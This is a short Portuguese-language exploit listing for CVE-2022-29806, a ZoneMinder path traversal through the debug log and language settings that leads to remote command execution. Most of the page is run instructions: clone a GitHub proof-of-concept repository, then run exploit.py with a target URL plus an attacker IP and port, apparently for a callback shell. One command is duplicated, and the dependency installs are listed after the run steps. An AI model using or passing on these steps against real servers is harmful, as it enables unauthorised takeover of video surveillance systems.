
ZoneMinder até 1.36.12 Language escalada de privilégios (e RCE) - Poc Exploit
ZoneMinder até 1.36.12 Escalação de privilégio de idioma (e RCE)

Uma vulnerabilidade de Path Traversal no arquivo de log de depuração e na opção de idioma padrão no ZoneMinder versão anterior a 1.36.13 e 1.37.11 permite que invasores escrevam e executem código arbitrário para alcançar execução remota de comandos.
"A prova de conceito foi testada contra ZoneMinder 1.36.4 ubuntu18.04 docker: ZoneMinder/zmdockerfiles, mas ainda é aplicável até a versão mais recente 1.36.12"
git clone https://github.com/OP3R4T0R/CVE-2022-29806
cd CVE-2022-29806
python3 exploit.py
python3 exploit.py -t <target_url> -ip <attacker_ip> -p <port>
python3 exploit.py -t <target_url> -ip <attacker-ip> -p <port>
pip3 install beautifulsoup4
pip3 install argparse
pip3 install requests
krastanoel descobriu a vulnerabilidade.